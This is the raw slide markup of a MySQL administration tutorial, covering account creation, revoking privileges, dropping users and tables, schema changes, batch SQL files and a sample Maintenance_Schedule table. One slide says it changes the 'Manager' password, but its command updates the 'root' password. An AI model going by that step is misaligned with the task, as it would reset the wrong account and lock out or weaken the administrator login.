              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>is also possible to create a new account by invoking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to directly insert new account information in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>table of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>database. In this case, you must also invoke the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>flush privileges;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>statement for the newly entered information to take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>effect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/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dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600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pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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539842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Installation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sz="2000" dirty="0" smtClean="0"/>
              <a:t>To revoke privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>granted to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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revoke all on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.* from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Revoking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>does not mean dropping the account because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> information continues to stay in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>table </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To completely drop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>account that was created </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>previously </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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drop user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>As you are experimenting with MySQL, you will occasionally run into a need to delete a previously created table for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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drop table if exists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>some_table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;; 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2000" dirty="0"/>
              <a:t>But if only want to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>empty out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a previously created table, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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delete from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>some_table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;; 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2000" dirty="0" smtClean="0"/>
              <a:t>Log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>as root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to change password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>associated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>account </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> set password = PASSWORD(’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’) where user = ’root’; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0" smtClean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300" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; flush privileges; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600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pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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295780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Installation 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sz="2000" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>hange </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>datatype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of a field </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>in table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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alter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>field_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>new_data_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>lace SQL commands in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>an ordinary text file and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>execute the file in a batch mode through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> shell </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>myFileWithSql.txt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400050"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>is no terminating semicolon on this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>statement </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>When using a text file in this manner, make sure that the first statement in the file is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>databaseName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>’ for the database for which the SQL statements are meant for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>see all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>accounts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that are currently in the system </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0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select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user.User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>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>from user; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1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pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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74227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Installation (7)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sz="2000" dirty="0" smtClean="0"/>
              <a:t>Place </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a table in this database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0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use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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create table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>operator_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> char(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)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>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-&gt; primary key not null, equipment char(20), deadline Date ); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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show tables; 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400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> values ( ’Operator1’, ’Engine parts’, ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>2016-05-04’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> values ( ’Operator2’, ’Transmission’, ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>2016-05-03’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>); 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400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> values ( ’Operator3’, ’Wheels’, ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
